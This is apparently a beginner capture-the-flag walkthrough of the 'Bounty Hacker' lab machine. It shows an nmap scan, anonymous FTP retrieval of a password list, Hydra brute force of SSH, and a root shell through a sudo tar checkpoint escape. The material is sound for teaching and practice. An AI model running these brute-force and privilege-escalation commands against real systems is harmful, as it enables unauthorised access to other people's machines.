Bounty Hacker

beginner35 minWriteup

Hack this machine and claim your bounty

Learning Objectives

  • Enumerate FTP service
  • Find credentials
  • Access via SSH
  • Privilege escalation

Bounty Hacker is a Cowboy Bebop-themed machine that teaches FTP enumeration, password cracking with Hydra, and tar sudo privilege escalation. Simple but teaches core skills.

Walkthrough

bash
1606070;"># Step 1: Scan
2nmap -sV -sC TARGET_IP
3606070;"># 21 FTP (anonymous login allowed!)
4606070;"># 22 SSH
5606070;"># 80 HTTP
6 
7606070;"># Step 2: FTP Anonymous Login
8ftp TARGET_IP
9606070;"># Username: anonymous
10606070;"># Password: (blank)
11 
12ftp> ls
13606070;"># Found: locks.txt, task.txt
14 
15ftp> get locks.txt
16ftp> get task.txt
17ftp> exit
18 
19606070;"># Step 3: Analyze Files
20cat task.txt
21606070;"># Mentions user "lin"
22 
23cat locks.txt
24606070;"># Password list!
25 
26606070;"># Step 4: Brute Force SSH
27hydra -l lin -P locks.txt ssh:606070;">//TARGET_IP
28 
29606070;"># Found: lin:RedDr4gonSyworD (or similar)
30 
31606070;"># Step 5: SSH Access
32ssh lin@TARGET_IP
33cat user.txt
34 
35606070;"># Step 6: Privilege Escalation
36sudo -l
37606070;"># lin can run /bin/tar as root!
38 
39606070;"># GTFOBins tar escape
40sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
41 
42606070;"># Root!
43cat /root/root.txt

Attack Path

1
FTPAnonymous login reveals credentials
2
Brute ForceHydra with found password list
3
SSHLogin as lin
4
Privesctar sudo escape via GTFOBins

GTFOBins

GTFOBins (gtfobins.github.io) lists ways to escape restricted environments using common Unix binaries. Essential for privilege escalation!

Knowledge Check

Quick Quiz
Question 1 of 1

What made FTP particularly useful on this machine?

Key Takeaways

  • Always check for anonymous FTP access
  • Downloaded files may contain usernames and passwords
  • Custom wordlists often work better than generic ones
  • GTFOBins is essential for sudo escape techniques